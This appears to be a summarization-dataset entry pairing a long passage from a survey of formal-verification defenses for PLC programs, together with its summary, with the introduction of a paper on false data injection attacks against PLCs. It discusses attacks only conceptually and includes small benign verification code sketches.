Lack of plant modeling. Galvao et al. [36] have pointed out the importance of plant models in formal verification.
However, existing studies focused on the formalization of PLC programs, rather than the I/O of the programs that directly reflects the behavior of the physical processes (e.g., the plant). Under T3, a few studies considered program I/O during behavior modeling. However, they either consider I/O as a generic module working together with the other modules [91], [99], or informally use data mining on program I/O to extract program event sequences [98]. It remains challenging to formalize plant models to improve PLC program security.

Lack of modeling evaluation. The majority of the studies adopted only one modeling method to obtain a program representation. We understand the representation is compatible with the formal verification framework. However, there were no scientific comparisons between models from different studies, beyond some high-level descriptions. Within one model, only a few studies [20], [69], [98] evaluated the number of states in their representations. It is even more difficult to understand the performance of the model from the security perspective.

State explosion. The aforementioned studies have already adopted an efficient representation that transforms a program unit into a state automaton, and formalizes the state transition between the current cycle and the next cycle. A less efficient representation transforms each variable of a program into a state, and formalizes the transitions between the states. Even though such a representation can benefit PLC programs in any language, it produces large models containing too many states to be verified, even for small and medium-sized programs. Therefore, in practice, most programs are modeled in the former, more efficient representation.
For large programs, however, both representations will produce large numbers of state combinations, causing the state explosion problem. The following describes research on state reduction.

5.2. State Reduction

The goal of state reduction is to improve the scalability and complexity of PLC program formalization. There are two common steps involved. First, we have to determine the meaningful states related to safety and security properties. Then, we trim the less meaningful states.

5.2.1. T1: program source code.

At the source code level, a line of studies [25], [29], [42], [79] performed state reduction. Gourcuff et al. [42] considered the meaningful states to be those related to the input and output variables, since they directly control the behavior of the physical processes. To obtain the dependency relations of the input and output variables, Gourcuff conducted static code analysis to get variable dependencies in an ST program, and found a large portion of unrelated states. Even though this method significantly reduced the state search space, it also skipped much of the original code in the subsequent verification. To improve the code coverage of the formalization, Pavlovic et al. [79] presented a general solution for FBD programs. They first transformed the graphical program into textual statements in textFBD, and further substituted the circuit variables to obtain tFBD. This approach removed the unnecessary assignments connecting continuous statements and merged them into one. On top of this approach, Darvas et al. fine-tuned the reduction heuristics with a more complete representation [25], [29]. Besides eliminating unnecessary variables or logic, these heuristics adopted Cone of Influence (COI)-based reduction and rule-based reduction. The COI-based reduction first removed unconditional states that all possible executions go through. It then removed variables that do not influence the evaluation of the specification.
The rule-based reduction could be specified based on the safety requirements of the application domain. Additionally, math models were also used to abstract different components. Newell et al. [76] defined additional structures, attribute maps, graphs, and block groups to reduce the state space of their PVS code. These studies successfully reduced the size of program states. They were limited, however, to basic Boolean representation reduction. For programs with complex time-related variables, function blocks, or multitasking, these studies were insufficient. It was also unclear whether the reduction could undermine program security. The following discusses other reduction techniques when such information is present.

5.2.2. T2: program bytecode/binary.

Studies at the binary level mostly adopted symbolic execution combined with flow-based representation, treating as meaningful the states that lead to different symbolic output vectors. TSV [71] merged the input states that all lead to the same output values. It also abstracted the temporal execution graphs by removing symbolic variables based on their product with the valuations of the LTL properties. To further reduce unrelated states, Chang et al. [21] reduced the overlapping output states of the same scan cycle, and removed the output states that had been analyzed in previous cycles. To reduce the overhead of timer modeling, they employed a deduction method for the output states of timers, through the analysis of the existing output state transition relationships. These reductions did not undermine the goal of detecting malicious behaviors spanning multiple cycles. Compared with T1, these studies were more interested in preserving temporal features, and targeted the reduction of random inputs in symbolic execution. However, without undermining the temporal feature modeling, the reduction of input states was inefficient given the lack of real inputs.
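The dependency-based reductions above (Gourcuff's I/O slicing and the COI heuristic) share one core step: starting from the output variables, walk the variable-dependency graph backwards and keep only what can influence an output. A minimal sketch, with an invented dependency graph:

```python
# Sketch of cone-of-influence style pruning: keep only the variables
# that can (transitively) influence an output variable.

def cone_of_influence(deps, outputs):
    """Backward closure over a var -> [vars it is computed from] graph."""
    keep, frontier = set(outputs), list(outputs)
    while frontier:
        v = frontier.pop()
        for d in deps.get(v, ()):
            if d not in keep:
                keep.add(d)
                frontier.append(d)
    return keep

deps = {                        # illustrative dependency graph
    "valve": ["level", "mode"],
    "level": ["sensor_raw"],
    "lamp": ["debug_flag"],     # feeds no output: pruned from the model
}
print(sorted(cone_of_influence(deps, ["valve"])))
```

Variables outside the returned set ("lamp", "debug_flag" here) never reach the specification's outputs, so the model checker can drop them; the caveat noted above is that dropped code may also hide stealthy behavior.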
The following discusses reduction techniques when runtime inputs are available.

5.2.3. T3: program runtime.

With runtime information, we can gain a better understanding of the truly meaningful states. These include the knowledge from event scheduling for subroutines and interrupts, and the real inputs and outputs from the domain-specific processes. Existing studies [53], [65], [98], [99] presented state reduction in different approaches. To reduce the scale of the model, Zhou et al. [99] modeled timers inline with the main program instead of as separate automata, since their model had considered the real environment traces, the interruptions, and the scheduling between them. Similarly, Wang et al. [91] compressed segments without jump and call instructions into one transition. Besides merging unnecessary states, the real inputs and domain-specific knowledge could narrow down the range for modeling numerical and float variables. In Zhang's study [98], continuous timing behavior was discretized into multiple time slices with a constant interval. Since the application-specific I/O traces are available, the time interval was narrowed to a range balancing efficiency and precision. Compared with studies at T1 and T2, state reduction at T3 was more powerful: not only were more realistic temporal and event-driven features supported, but domain-specific runtime information also helped to extract more meaningful states.

5.2.4. Challenges.

Lack of ground truth for continuous behavior. We discussed that runtime traces helped to determine a realistic granularity for continuous behaviors. However, choosing the granularity was still experience-based and ad hoc. In fact, a too coarse granularity would fail to detect actual attacks, while a too fine granularity expects infeasible attack scenarios [36].
Abstracting a ground truth model for continuous behavior remains challenging.

Implicitness and stealthy attacks from reduction. Although existing studies have considered property preservation, the reduced unrelated states may undermine PLC security. We mentioned in Section 4 that implicit specifications had led to attacks. The reduced states may cause an implicit mapping between the variables in the program and its specification, or they may contain stealthy behaviors that were simply omitted by the specification. The following discusses research on specification generation.

5.3. Specification Generation

The goal of these studies is to generate safety and security specifications with formal semantics. Specifying precise and complete desired properties is difficult. Existing studies focused on two aspects: (1) process-independent properties that describe the overall requirements for a control system, and (2) domain-specific properties that require domain expertise.

5.3.1. T1: program source code.

At the source code level, a line of studies [13], [27], [28], [41], [47] investigated specification generation with process-independent properties. These properties include avoiding variable locks, avoiding unreachable operating modes, keeping operating modes mutually exclusive, and avoiding irrelevant logic [81]. Existing studies [4], [10], [16], [74], [81] usually adopted CTL or LTL-based formulas to express these properties. LTL describes the future of paths, e.g., a condition will eventually be true, or a condition will be true until another fact becomes true. CTL describes invariance and reachability, e.g., the system never leaves a set of states, or the system can reach a set of states, respectively. Other variants included ACTL, adopted by Rawlings [81], and ptLTL, adopted by Biallas [12]. Besides CTL and LTL-based formulas, proof assistants were also investigated to assist the development of formal proofs.
To formally define the syntax and semantics, Biha et al. [13] used a type theory based proof assistant, Coq, to define the safety properties for IL programs. The semantics concentrated on the formalization of on-delay timers, using discrete time with a fixed interval. Besides Coq, the K framework [47] was also adopted to provide a formal operational semantics for ST programs. K is a rewriting-based semantic framework that has been applied to define the semantics of C and Java. Compared with Coq, K is less formal but lighter and easier to read and understand. The trade-off is that manual effort is required to ensure the formality of the definition. These studies limited specification generation to certain program models. To enable formal semantics for state-based, data-flow-oriented, and time-dependent program models, Darvas et al. [27] presented PLCspecif to support various models. These studies provided opportunities for engineers lacking formalism expertise to generate formal and precise requirements. The proof assistant frameworks even allowed generating directly executable programs, e.g., C programs. Nevertheless, only process-independent properties could be automated; the following discusses specification generation with more information available.

5.3.2. T2: program bytecode/binary.

As mentioned earlier, symbolic execution allowed these studies to support program modeling with numeric and float variables. These variables provided more room for property definitions in the specification. TSV [71] defined properties bounding numerical device parameters, such as the maximum drive velocity and acceleration. Others [21], [93], [100] defined properties to detect malicious code injection and parameter tampering attacks. Xie et al. [93] expanded the properties to detect stealthy attacks and denial of service attacks. Similar to studies at T1, these studies all adopted LTL-based formalisms, and could automate process-independent property generation.
To accommodate certain attack strategies, the specification generation was manually defined.

5.3.3. T3: program runtime.

With runtime information available, specification generation concentrated more on domain-specific properties. In a waste water treatment plant setting, Luccarini et al. [65] applied artificial neural networks to extract qualitative patterns from the continuous signals of the water, such as the pH and the dissolved oxygen. These qualitative patterns were then mapped to the control events in the physical processes. The mapping was logged in XML and translated into formal rules for the specification. This approach considered the collected input and output traces as ground truth for security and safety properties, and removed the dependencies on domain expertise. In reality, the runtime traces might be polluted, or contain incomplete properties for verification. To ensure the correctness and completeness of domain-specific rules, existing studies [36], [98] also considered semi-automated approaches, which combined automated data mining with manual domain expertise. VetPLC [98] formally defined the safety properties through automatic data mining and event extraction, aided by domain expertise in crafting safety specifications. VetPLC adopted timed propositional temporal logic (TPTL), which was more suitable for quantitatively expressing safety specifications. Besides (semi-)automated specification generation, Mesli et al. [72] manually defined a set of rules for the interaction between each component along the chain of control. The requirements are also written in CTL temporal logic. To assist domain experts in developing formal rules, Wang et al. [91] formalized the semantics of a BIP model for all types of PLC programs. It automated process-independent rules for interrupts, such as following the first come first serve principle. These studies enabled specification generation with domain-specific knowledge.
They thus expanded security research with more concentration on safety requirements.

394 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply.

5.3.4. Challenges. Lack of specification-refined programming. Since these studies already assumed the existence of the PLC programs (source code or binary), the generated specification could help refine the programming and program modeling. We have mentioned earlier that state reduction considered property preserving, and removed irrelevant logic from program modeling. However, generated properties did not provide direct feedback to the program source code. In fact, program refinement in an approach similar to state reduction is promising in eliminating irrelevant stealthy code from the source.

Ad-hoc and unverified specification translations. Despite the availability of formal semantics and proof assistants, such as Coq, PVS, and HOL, existing requirements are informally defined in high-level languages, and vary across industrial domains. Existing studies translating these requirements encountered many challenges: (1) the trade-off between an automated but unverified approach and a formal but manual rewriting, (2) the dependencies on the programming language (many studies were based on IL [47], deprecated in IEC 61131-3 since 2013), and (3) rules based on sample programs without the complexity of the real industry.

Barrier for automated domain-specific property generation.
Although Luccarini [65] presented a promising approach, it was based on two unrealistic assumptions: (1) the trace collected from the physical processes was complete and could be trusted, and (2) the learning algorithm extracted the rules completely and accurately. Without further proofs (manual domain expertise) to lift these two assumptions, the extracted properties would be an incomplete white list which may also contain implicitness, leading to false positives or true negatives in the verification or detection.

Specification generation with evolved system design. Increasing requirements were laid on PLC programs, considering the interactions from new components. In the behavior modeling, we have observed studies formalizing the behaviors of new interactions on top of existing models, for example, adding a scheduler module combining an existing program with a new component. Compared with that, we saw fewer studies investigating incremental specification generation based on existing properties. It was still challenging to define the properties to synchronize PLC programs with various components, especially in a timing-sensitive fashion.

5.4. Verification

We already discussed the modeling of program behavior, and specification generation. With these, a line of studies [9], [10], [16], [17], [20], [74], [75], [77], [80], [81], [96] applied model checking and theorem proving to verify the safety and security of the programs. These studies applied several formal verification frameworks, summarized in Table 2. The majority of them used Uppaal and Cadence SMV. Uppaal was used for real-time verification, representing a network of timed automata extended with integer variables, structured data types, and channel synchronization. Cadence SMV was used for untimed verification.

5.4.1. T1: program source code. At the source code level, formal verification studies aimed at verifying weaknesses W1-W4, to defend against general safety problems.
They had been applied to programs from different industries. To defend G1, Bender et al. [10] adopted model checking for LD programs modeled as timed Petri nets. They applied model checkers in the Tina toolkit to verify LTL properties. Bauer et al. [9] adopted Cadence SMV and Uppaal to verify untimed modeling and timed modeling of SFC programs, respectively. They identified errors from three reactors. Similarly, Niang et al. [77] verified a circuit breaker program in SFC using Uppaal, based on a recipe book specification. To defend G2, Hailesellasie et al. [44] applied Uppaal and compared two formally generated attributed graphs: the Golden Model with the properties, and a random model formalized from a PLC program. The verification is based on the comparison of nodes and edges of the graphs. They detected stealthy code injections. Instead of adopting existing tools, several studies developed their own frameworks for verification. Arcade.PLC [12] supported model checking with CTL- and LTL-based properties for all types of PLC programs. PLCverif [28] supported programs from all five Siemens PLC languages. NuDE 2.0 [56] provided formal-method-based software development, verification and safety analysis for nuclear industries. Rawlings et al. [81] applied the symbolic model checking tools st2smv and SynthSMV to verify and falsify an ST program controlling batch reactor systems. They automatically verified process-independent properties, rooted in W1-W4. Besides model checking, existing studies [76] also adopted PVS theorem proving to verify the safety properties described in tabular expressions in a railway interlocking system. These studies are limited to general safety requirements verification. To defend G2 and G3, more information is needed, as discussed in the following.

5.4.2. T2: program bytecode/binary. This line of studies [21], [71], [91], [93], [100] allowed us to detect binary tampering attacks. TSV [71] combined symbolic execution and model checking.
It fed the model checker with an abstracted temporal execution graph, with its manually crafted LTL-based safety property. Due to its support for random timer values within one cycle, TSV was limited in checking code with timer operations, and still suffered from state explosion problems. Xie et al. [93] mitigated this problem with the use of constraints in verifying random input signals. Xie used the nuXmv model checker. Chang et al. [21] applied a less formal verification based on the number of states. These studies successfully detected malicious parameter tampering attacks, based on sample programs controlling traffic lights, an elevator, a water tank, a stirrer, and a sewage injector.

5.4.3. T3: program runtime. With runtime information, existing studies could verify domain-specific safety and security issues, namely all the weaknesses and security goals discussed in Section 4. To defend G1 by considering the interactions to the program, Carlsson et al. [18] applied NuSMV to verify the interaction between the Open Platform Communications (OPC) interface and the program, using properties defined as server/client states. They detected synchronization problems, such as jitter, delay, race conditions, and slow sampling caused by the OPC interface. Mesli [72] applied Uppaal to multi-layer timed automata, based on a set of safety and usability properties written in CTL. They detected synchronization errors between the control programs and the supervision interfaces. To fully leverage the knowledge from the physical processes, VetPLC [98] combined runtime traces, and applied BUILDTSEQS to verify security properties defined in timed propositional temporal logic. HyPLC [38] applied the theorem prover KeYmaera X to verify properties defined in differential dynamic logic.
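At their core, the model-checking approaches surveyed here reduce to exploring a program's state space against a property. The sketch below is a minimal explicit-state reachability check over a toy transition system standing in for a PLC program model; it is not any specific tool, and the example system is invented:

```python
from collections import deque

def check_invariant(init, next_states, invariant):
    """Explicit-state reachability: explore every state reachable from
    `init` (BFS) and return a counterexample state that violates
    `invariant`, or None if the invariant holds everywhere reachable."""
    seen, frontier = {init}, deque([init])
    while frontier:
        s = frontier.popleft()
        if not invariant(s):
            return s  # counterexample found
        for t in next_states(s):
            if t not in seen:
                seen.add(t)
                frontier.append(t)
    return None

# Toy "program model": a counter that wraps at 4; invariant: counter < 5.
cex = check_invariant(0, lambda s: [(s + 1) % 4], lambda s: s < 5)
print(cex)  # None -> the invariant holds in every reachable state
```

Symbolic model checkers such as NuSMV avoid enumerating states explicitly, which is exactly how they sidestep the state explosion problems mentioned above, but the underlying question ("is a bad state reachable?") is the same.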
Different from VetPLC, HyPLC aimed at a bi-directional verification between the physical processes and the PLC program, to detect safety violations. These studies either assumed an offline verification, or vaguely mentioned using a supervisory component for online verification. To provide an online verification framework, Garcia et al. [40] presented an on-device runtime solution to detect control logic corruption. They leveraged an embedded hypervisor within the PLC, with more computational power and integration of direct library function calls. The hypervisor overcame the difficulties of strict timing requirements and limited resources, and allowed verification to be enforced within each scan cycle.

5.4.4. Challenges. Lack of benchmarks for formal verification. Similar to the challenges in behavior modeling, an ideal evaluation should be multi-dimensional: across modeling methods, across verification methods, and based on a set of benchmark programs. Existing evaluations, if performed, were limited to one dimension and based on at most a few sample programs. These programs were often vendor-specific, test-case driven, and failed to reflect the real industry complexity. Without a representative benchmark and concrete evaluation, the security solution design would still be ad-hoc.

Open-source automated verification frameworks. Existing studies have presented several open-source frameworks taking a PLC program as input, and automatically generating the formal verification result over generic properties. These frameworks (e.g., Arcade.PLC, st2smv and SynthSMV) lowered the bar for security analysis using formal verification. However, over the years, such frameworks were no longer supported. No comparable replacement emerged, except PLCverif [26] targeting Siemens programs.

High demand for runtime verification.
The challenges include (1) expanded attack landscapes due to increasingly complex networking, (2) the trade-off between limited available resources on the PLC and real-time constraints, (3) runtime injected stealthy attacks due to insecure communication, and (4) runtime denial-of-service attacks omitted by existing studies.

6. Recommendations

We have described and discussed the security challenges in defending against PLC program attacks using formal verification and analysis. Next, we offer recommendations to overcome these challenges. Our recommendations highlight promising research paths based on a thorough analysis of the state-of-the-art and the current challenges. We consider these recommendations equally relevant regardless of any particular factor neither mentioned nor considered in this section that may change this perception.

6.1. Program Modeling

6.1.1. Plant Modeling. We discussed the lack of formalized plant modeling in Section 5.1.4. We recommend more research in plant modeling to formalize more accurate and complete program behaviors. Future research should consider refinement techniques to define the granularity and level of abstraction for the plant models and the properties to verify. The refinement techniques should consider the avoidance of state explosion, by extracting feasible conditions of the plant that can trigger property violations in the program.

6.1.2. Input manipulation verification. Plant modeling is also promising in mitigating program input manipulation attacks. As mentioned in Section 4, input manipulation is widely adopted by attackers. Future research should consider the Orpheus [23] prototype in a PLC setting. Orpheus performs event consistency checking between the program model and the plant model to detect input manipulation attacks. To perform event consistency checking in a PLC, future research may consider instrumentation on the input and output variables of the programs, and compare the values with those from the plant models.

6.2.
State Reduction

In Section 4.1.1, we discussed code-level attacks that could disguise themselves as bad coding practice, and are hard to notice. During state reduction, based on an existing specification, unrelated states are trimmed to avoid state explosion problems. However, as mentioned in Section 4.2, existing studies failed to investigate the relationship between the unrelated states and the original program. It could be hidden jumps with a stealthy logger to leak program-critical information. The specification might only consider the noticeable unsafe behaviors, which can disturb the physical processes, while letting the states from the stealthy code be recognized as unrelated. We, therefore, recommend future research to investigate the security validation of unrelated code, and consider automatic program cleaning for the stealthy code.

6.3. Specification Generation

6.3.1. Domain-specific property definition. As mentioned in Section 5.3.4, there are barriers in automatic generation of domain-specific properties, and manually
TABLE 2: Common frameworks for formal verification

Framework | Modeling Language | Property Language / Prover | Supported Verification Techniques
NuSMV/nuXmv | SMV input language (BDD) | CTL, LTL | SMT, model checking, fairness requirements
Uppaal | Timed automata with clock and data variables | TCTL subset | Time-related and probability-related properties
Cadence SMV | SMV input language (BDD) | CTL, LTL | Temporal logic properties of finite state systems
SPIN | Promela | LTL | Model checking
UMC | UML | UCTL | Functional properties of service-oriented systems
Coq | Gallina (Calculus of Inductive Constructions) | Vernacular | Theorem proof assistant
PVS | PVS language (typed higher-order logic) | Primitive inference | Formal specification, verification and theorem prover
Z3 | SMT-LIB2 | SMT-LIB2 theories | Theorem prover

TABLE 3: Existing studies using formal verification to detect control logic attacks

Paper | Security Goal | Defense Focus | Verification Techniques | Property | PLC Language | Tools

T1: program source code
Adiego 15 [4] | GI1 | BM, SG | MC | CTL, LTL | ST, SFC | nuXmv, PLCverif, Xtext, UNICOS
Bauer 04 [9] | GI1, GI3 | FV | MC | CTL | SFC | Cadence SMV, Uppaal
Bender 08 [10] | GI3 | SG, FV | MC | seLTL | LD | Tina Toolkit
Biallas 12 [12] | GI1, GI3 | SG, FV | MC | CTL, ptLTL | generic | PLCopen, Arcade.PLC*, CEGAR
Biha 11 [13] | GI1 | SG | TP | N/A | IL | SSReflect in Coq, CompCert
Brinksma 00 [16] | GI3 | SG | MC | N/A | SFC | SPIN/Promela, Uppaal
Darvas 14 [25] | GI1 | SR | MC | CTL, LTL | ST | COI reduction, NuSMV
Darvas 15 [27] | GI1, GI3 | SG | EC | N/A | ST | PLCspecif
Darvas 16-1 [28] | GI1 | SG, FV | N/A | temporal logic | ST | PLCverif, nuXmv, Uppaal
Darvas 16-2 [29] | GI1 | SR | MC, EC | temporal logic | LD, FBD | PLCverif, NuSMV, nuXmv, etc.
Darvas 17 [30] | GI1 | BM | N/A | temporal logic | IL | PLCverif, Xtext parser
Giese 06 [41] | GI1 | BM, SG | EC | N/A | ST | GROOVE, ISABELLE, FUJABA
Gourcuff 06 [42] | GI1, GI3 | SR | MC | N/A | ST, LD, IL | NuSMV
Hailesellasie 18 [44] | GI1, GC | FV | MC | N/A | SFC, ST, IL | BIP, nuXmv, Uppaal, UBIS model
Huang 19 [47] | GI1 | SG | N/A | N/A | ST | K framework, KST model
Kim 17 [56] | GI1, GI3 | FV | MC, EC | CTL | FBD, LD | CASE tools (NuDE 2.0), NuSCR
Moon 94 [74] | GI1 | SG | MC | CTL | LD | N/A
Newell 18 [76] | GI1, GI3 | BM, SR | TP | N/A | FBD | PVS theorem prover
Niang 17 [77] | GI3 | FV | MC | N/A | generic | Uppaal, program translators
Pavlovic 10 [79] | GI1, GI3 | SR | MC | CTL | FBD | NuSMV
Rawlings 18 [81] | GI1 | SG, FV | MC | CTL, ACTL | ST | st2smv, SynthSMV*
Mader 00 [66] | GI1 | BM | N/A | N/A | generic | N/A
Ovatman 16 [78] | GI1, GI3 | BM, FV | MC | N/A | generic | N/A
Moon 92 [75] | GI1, GI3 | ALL | MC | CTL | LD | aCTL model checker
Bohlender 18 [14] | GI1, GI3 | SR | MC | N/A | ST | Z3, PLCopen, Arcade.PLC
Kuzmin 13 [61] | GI1 | BM | N/A | LTL | ST | Cadence SMV
Bonfe 03 [15] | GI3 | BM | N/A | CTL | generic | SMV, CASE tools
Chadwick 18 [20] | GI3 | BM, SG | TP | FOL | LD | Swansea
Frey 00 [35] | GI1, GI3 | BM | N/A | N/A | N/A | N/A
Yoo 09 [96] | GI3 | ALL | MC, EC | CTL | FBD | NuSCR, Cadence SMV, VIS, CASE
Lamperiere 99 [62] | GI1 | BM | N/A | N/A | generic | N/A
Kottler 17 [59] | GI3 | ALL | N/A | CTL | LD | NuSMV
Younis 03 [97] | GI1, GI3 | BM | N/A | N/A | generic | N/A
Rossi 00 [82] | GI1 | BM | MC | CTL, LTL | LD | Cadence SMV
Vyatkin 99 [89] | GI1 | BM | MC | CTL | FBD | SESA model-analyser

T2: program bytecode/binary
Canet 00 [17] | GI1, GI3 | ALL | MC | LTL | IL | Cadence SMV
Chang 18 [21] | GI1 | ALL | MC | LTL, CTL | IL | DotNetSiemensPLCToolBoxLibrary
McLaughlin 14 [71] | GI1, GI3 | ALL | MC | LTL | IL | TSV, Z3, NuSMV
Xie 20 [93] | GI1, GC, GA | BM, SG, FV | MC | LTL | IL | SMT, nuXmv
Zonouz 14 [100] | GI1, GI3 | BM, SG, FV | MC | LTL | IL | Z3, NuSMV

T3: program runtime
Carlsson 12 [18] | GI | FV | MC | CTL, LTL | N/A | NuSMV
Cengic 06 [19] | GI2 | BM | MC | CTL | FBD | Supremica
Galvao 18 [36] | GI3, GI4 | SG | MC | CTL | FBD | ViVe/SESA
Garcia 16 [40] | GI3 | FV | MC | DFA | LD, ST | N/A
Janicke 15 [53] | GI1, GI2 | BM, SR | MC | ITL | LD | Tempura
Luccarini 10 [65] | GI3, GI4 | BM, SR, SG | TP | CLIMB | N/A | SCIFF checker
Mesli 16 [72] | GI | BM, SG, FV | MC | TCTL | LD, FBD | Uppaal
Wang 13 [91] | GI1, GI2 | BM, SR, SG | MC | LTL, MTL | IL | BIP
Zhang 19 [98] | GI, GC | ALL | MC | TPTL | ST | BUILDTSEQS algorithm
Zhou 09 [99] | GI | BM, SR | MC | TCTL | IL | Uppaal
Wan 09 [90] | GI1, GI2 | BM, FV | TP | Gallina | LD | Coq, Vernacular
Garcia 19 [38] | GI | BM | TP | differential dL | ST | KeYmaera X
Mokadem 10 [73] | GI3 | BM | MC | TCTL | LD | Uppaal
Cheng 17 [23] | GI2, GC | BM | N/A | eFSA | N/A | LLVM DG
Ait 98 [5] | GI2 | SG | TP | FOL | N/A | Atelier B

Defense focus: Behavior Modeling (BM), State Reduction (SR), Specification Generation (SG), and Formal Verification (FV). Verification techniques: model checking (MC), equivalence checking (EC), and theorem proving (TP). In tools: items in bold are self-developed, bold italics are open-source, and * represents tools no longer maintained.

defined properties can cause implicitness. We recommend future research to consider domain-specific properties as a hybrid program consisting of continuous plant models as well as discrete control algorithms. These properties can be formalized using differential dynamic logic and verified with a sound proof calculus. Existing research [38] has formalized the dynamic logic model of a water treatment testbed controlled by an ST program. The formalization aims to understand safety implications, and can only support one task with Boolean operations. Future research should explore the formalization of dynamic logic with the goal of security verification, and support arithmetic operations, multitask programs, and applications in other domains.

6.3.2. Incremental specification generation. We discussed attacks using expanded input surfaces or a full chain of vulnerabilities in Section 4.2. We also discussed the challenges given the fast-evolving system design in Section 5.3.4. This leads us to think about incremental specification generation, with a full chain of behaviors, and updates in a dynamic spectrum.
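The differential-dynamic-logic style of property recommended in Section 6.3.1 can be illustrated with a toy hybrid program. The tank level x, capacity H, and inflow command u below are hypothetical; this is an illustrative sketch, not the formula from [38]:

```latex
% Toy dL safety property: the discrete controller either opens the
% inflow (u := 1, guarded by x < H) or closes it (u := 0); the level
% then evolves continuously as x' = u within the domain x <= H.
% The loop never drives the level outside [0, H].
0 \le x \le H \;\rightarrow\;
  \Big[ \big( \big( (u := 1;\ ?\,x < H) \,\cup\, u := 0 \big);\
        \{ x' = u \ \&\ x \le H \} \big)^{*} \Big]\,
  (0 \le x \le H)
```

The formula couples a discrete choice with an ODE inside a loop, which is exactly the "continuous plant model plus discrete control algorithm" hybrid shape recommended above.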
Incremental specification generation [5] has been designed for interactive systems. In the PLC chain of control, interactions should consider both the physical process changes and the inclusion of the engineering station. Modeled behaviors from these new interactions should be compatible with existing properties. To update in a dynamic spectrum, the behavior changes from each interactive component should support automatic generation and comparison. This requires automatic translations between the behavior models of each component. The closest study is HyPLC [38], which supported automatic translation between the PLC program and the physical plant model. However, incremental specification generation was not considered. We encourage future research to investigate this direction, and seek interactive mutual refinement.

6.4. Verification

6.4.1. Real-time attack detection. As shown in Sections 5.4.3 and 5.4.4, there is a high demand for runtime verification beyond a high-level prototype. To perform runtime verification, existing studies depend on engineering stations. However, Section 4.1.3 has demonstrated runtime attacks aiming at evading or deceiving the engineering station from runtime detection. The engineering stations have been exposed to various vulnerabilities [1], [50], [51], due to the rich features supported outside the scope of security. Therefore, we recommend future research to consider a dedicated security component, such as the bump-in-the-wire solution provided by TSV [71]. This component is promising in eliminating the resource constraints within a PLC, and allows the program to meet the strict cycle time. In addition to the real-time requirement, future research should also learn from existing attack studies [37], [54], and consider exploring the verification between the PLC and the other interacting components, including the engineering station.

6.4.2. Open-source tools and benchmarks.
We discussed in Section 5.4.4 that the lack of open-source tools and benchmarks has led to ad-hoc studies without evaluations on models and verification techniques. It is promising to see PLCverif [26] become open-source and support integration of various model checking tools. We recommend future studies to continue the development of open-source tools, to cover program modeling, state reduction, specification generation, and formal verification. To adapt to broad use cases, we suggest the tools be IEC 61131 compliant, compatible with existing open-source PLC tools [7], and consider long-term maintenance. We also recommend future studies to develop PLC security benchmarks, including a collection of open-source programs that are vendor-independent and can represent industrial complexities, and a set of security metrics that can support concrete evaluations.

6.4.3. Multitask Verification. In Section 4.1.3, we have discussed attacks that can use PLC multitasking to perform denial-of-service attacks and spread stealthy worms. To defend against multitask attacks, existing studies [39], [73] only considered checking the reaction time between tasks to detect failures to meet the cycle time requirement. We recommend future research to consider more attack scenarios involved in multitask programs, for example, using one task to spy on or spread malicious code to the other co-located tasks, as done in PLCInject [58] and PLC-Blaster [85], or manipulating shared resources (e.g., global variables) between tasks to produce non-deterministic output to disturb the physical processes. Future research should explore the verification of these attack scenarios, with the consideration of task intervals and priorities at various granularities.

7. Conclusion

This paper provided a systematization of knowledge based on control logic modification and formal verification-based defense. We categorized existing studies based on threat models, security goals, and underlying weaknesses.
We discussed the techniques and approaches applied by these studies. Our systematization showed that control logic modification attacks have evolved with the system design. Advanced attacks could compromise the whole chain of control, and in the meantime evade various security detection methods. We found that formal verification based defense studies focus more on integrity than confidentiality and availability. We also found that the majority of the research investigates ad-hoc formal verification techniques, and that barriers exist in every aspect of formal verification.

To overcome these barriers, we suggest a full chain of protection and we encourage future research to investigate the following: (1) formalize plant behaviors to defend against input manipulation attacks, (2) explore stealthy attack detection with state reduction techniques, (3) automate domain-specific specification generation and incremental specification generation, and (4) explore real-time verification with more support in open-source tools and thorough evaluation.

Acknowledgment

The authors would like to thank the anonymous reviewers for their insightful comments. This project was supported by the National Science Foundation (Grant #: CNS-1748334) and the Army Research Office (Grant #: W911NF-18-1-0093). Any opinions, findings, and conclusions or recommendations expressed in this paper are those of the authors and do not necessarily reflect the views of the funding agencies or sponsors.
Summary:
Programmable Logic Controllers (PLCs) play a critical role in industrial control systems. Vulnerabilities in PLC programs might lead to attacks causing devastating consequences to critical infrastructure, as shown in Stuxnet and similar attacks. In recent years, we have seen an exponential increase in vulnerabilities reported for PLC control logic. Looking back on past research, we found extensive studies explored control logic modification attacks, as well as formal verification-based security solutions. We performed systematization on these studies, and found attacks that can compromise a full chain of control and evade detection. However, the majority of the formal verification research investigated ad-hoc techniques targeting PLC programs. We discovered challenges in every aspect of formal verification, arising from (1) the ever-expanding attack surface from evolved system design, (2) the real-time constraint during program execution, and (3) the barrier in security evaluation given proprietary and vendor-specific dependencies on different techniques. Based on the knowledge systematization, we provide a set of recommendations for future research directions, and we highlight the need to defend against security issues besides safety issues.
|
Summarize:
I. INTRODUCTION

The power grid is a critical interconnected infrastructure whose reliable operation depends crucially on its cyber assets. Today, the reliability of the interdependent power and cyber infrastructures making up the grid is largely managed through traditional purely-cyber security solutions. However, those methods cannot adequately protect cyber-physical platforms against emerging intrusions that consider both cyber and physical assets. As a case in point, the Stuxnet malware compromised human machine interface (HMI) servers and uploaded malicious code to programmable logic controllers (PLCs)1 to physically damage the PLC-controlled centrifuges [12]. Generally, however, HMI servers reside within well-protected power control networks, and are often very challenging to compromise. This paper presents a false data injection attack that makes PLCs perform malicious actions through manipulation of their inputs. PLCs' inputs come from remote sensors, which are generally assumed to be compromised in FDI attacks. The proposed attack does not require penetration into hardened control networks or malicious code uploads.

From a data perspective, power systems consist of sensor data acquisition, processing, and control commands. The information path from the field sensors to end-point power control network assets, e.g., PLCs, enables power system applications such as state estimation and equipment control. The data integrity within the information path may be low for many reasons, including misconfigurations, sensor or communication failures, or coordinated false data injection attacks. Indeed, noisy data are constantly present in the system, yet the system maintains a high level of reliability due to mechanisms put in place to detect and deal with such data.

1PLCs are MIMO micro-controller devices used widely in industrial control systems for control automation purposes.
However, recent research [20], [30] has shown that maliciously coordinated false data injection attacks may be able to bypass traditional state estimation mechanisms put in place to detect noisy data, and that such attacks may impact power system state estimation applications to manipulate the calculated system state estimate [18], [26], [28].

